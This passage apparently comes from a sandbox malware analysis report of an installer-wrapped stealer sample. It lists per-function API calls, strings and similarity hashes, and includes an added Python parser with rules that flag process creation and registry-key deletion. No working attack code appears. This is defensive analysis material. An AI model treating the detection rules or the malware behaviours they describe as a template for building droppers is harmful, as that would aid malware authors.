                                                              • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                              • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
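The records on this page are the raw material an analyst turns into API-sequence features. The log strings they carry (`Exec: command="%s"`, `RMDir: RemoveDirectory("%s")`, `verifying installer: %d%%`, `Error registering DLL: Could not initialize OLE`, `Error launching installer`) are the NSIS installer runtime's own messages, so these functions belong to the installer stub that wraps the payload rather than to the stealer itself; the stub is what the `CreateProcessW` / `WaitForSingleObject` / `GetExitCodeProcess` record and the `RegEnumKeyW` / `RegDeleteKeyW` record above describe. The following is an added example, not Joe Sandbox code and not part of the sample: a Python parser for this record format that extracts each function's API calls, strings and similarity hashes, then applies a small rule set to flag process creation, waiting on a child process and recursive registry-key deletion. The rule labels are assumptions chosen for illustration, and the sample text embedded in the script is constructed from the two records just mentioned, trimmed to the sections the parser reads.

```python
"""Parse the per-function 'APIs' / 'Strings' / 'Similarity' records emitted by
the Joe Sandbox IDA plugin and flag security-relevant API combinations.
Added example for this report, not Joe Sandbox code; RULES labels are assumptions."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from this page (the ExecWait-style block
# and the registry-key-delete block), trimmed to the sections the parser reads.
SAMPLE = """\
APIs
  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
Strings
• Exec: failed createprocess ("%s"), xrefs: 004022C2
• Exec: success ("%s"), xrefs: 00402263
• Exec: command="%s", xrefs: 00402241
Similarity
• API String ID: 2014279497-3433828417
• Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Similarity
• API String ID: 1912718029-0
• Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
"""

# "• [Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: XXXXXXXX"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})\s*$"
)
STR_RE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*?)\s*$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str                       # call-site address
    subcall: Optional[str] = None  # callee address when reported as "Part of subcall"


@dataclass
class Record:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    api_string_id: tuple[int, int] = (0, 0)  # (API hash, string hash); "-0" means no strings
    fuzzy_hash: str = ""


def parse_records(text: str) -> list[Record]:
    """Each 'APIs' header opens a new record; later headers switch sections."""
    records: list[Record] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if line == "APIs":
                records.append(Record())
            continue
        if not records:
            continue
        rec = records[-1]
        if section == "APIs" and (m := API_RE.match(raw)):
            args = m["args"].split(",") if m["args"] else []
            rec.apis.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(raw)):
            rec.strings.append(m["text"])
        elif section == "Similarity" and (m := KV_RE.match(raw)):
            if m["key"] == "API String ID":
                a, b = m["val"].split("-")
                rec.api_string_id = (int(a), int(b))
            elif m["key"] == "Instruction Fuzzy Hash":
                rec.fuzzy_hash = m["val"]
    return records


# Assumed labels: every API in the set must appear (directly or via a subcall).
RULES = {
    "process-creation": {"CreateProcessW"},
    "child-process-wait": {"WaitForSingleObject", "GetExitCodeProcess"},
    "registry-key-delete": {"RegEnumKeyW", "RegDeleteKeyW"},
}


def api_names(rec: Record) -> set[str]:
    return {c.api for c in rec.apis}


def direct_call_sequence(rec: Record) -> list[str]:
    """Direct (non-subcall) calls ordered by call-site address, a proxy for call order."""
    direct = [c for c in rec.apis if c.subcall is None]
    return [c.api for c in sorted(direct, key=lambda c: int(c.ref, 16))]


def flag(rec: Record) -> set[str]:
    names = api_names(rec)
    return {label for label, need in RULES.items() if need <= names}


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, direct_call_sequence(rec), sorted(flag(rec)), rec.strings)
```

Ordering direct calls by call-site address only approximates execution order (loops and branches reorder it), so treat the sequence as a feature for matching, not as a trace. The `Instruction Fuzzy Hash` and `API String ID` values are the fields to compare across reports when checking whether another dropper carries the same installer stub; the `-0` suffix on the registry record's `API String ID` records that the function references no strings.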
                                                              APIs
                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                              • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                              APIs
                                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                              • wsprintfW.USER32 ref: 00404483
                                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s
                                                              • API String ID: 3540041739-3551169577
                                                              • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                              • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                              APIs
                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                              Similarity
                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                              • API String ID: 1697273262-1764544995
                                                              • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                              • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                              APIs
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                              Strings
                                                              Similarity
                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                              • String ID: CopyFiles "%s"->"%s"
                                                              • API String ID: 2577523808-3778932970
                                                              • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                              • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: lstrcatwsprintf
                                                              • String ID: %02x%c$...
                                                              • API String ID: 3065427908-1057055748
                                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              Similarity
                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                              • API String ID: 2266616436-4211696005
                                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00402100
                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
Similarity
• API ID: CapsCreateDeviceFontIndirectVersionwsprintf
• String ID:
• API String ID: 1599320355-0
• Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
• Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
• Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
• Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
APIs
  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
• lstrcmpW.KERNEL32(?,Version ), ref: 00407276
• lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
Strings
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
• Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
• Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
APIs
• DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
• Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
• Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
• Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
• API String ID: 2883127279-0
• Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
• Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
• Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
• Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
APIs
• IsWindowVisible.USER32(?), ref: 0040492E
• CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Strings
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
• Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
• Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
• Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Strings
Similarity
• API ID: PrivateProfileStringlstrcmp
• String ID: !N~
• API String ID: 623250636-529124213
• Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
• Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
• Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
• Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
• Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
• Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
• Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
• wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
Similarity
• API ID: CloseHandlelstrlenwvsprintf
• String ID: RMDir: RemoveDirectory invalid input("")
• API String ID: 3509786178-2769509956
APIs
• lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
• lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
• CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
• lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
Memory Dump Source
• Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
Strings
Memory Dump Source
• Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$4']q$4']q
• API String ID: 0-1785108022
Memory Dump Source
• Source File: 00000011.00000002.2787196058.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_4a50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000011.00000002.2787196058.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_4a50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000011.00000002.2787196058.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_4a50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000011.00000002.2786774160.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_300d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000011.00000002.2786774160.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_300d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
• API String ID: 0-108373575
Strings
Memory Dump Source
• Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
• API String ID: 0-108373575
Strings
Memory Dump Source
• Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
Similarity
• API ID:
• String ID: $]q$$]q$$]q$$]q
• API String ID: 0-858218434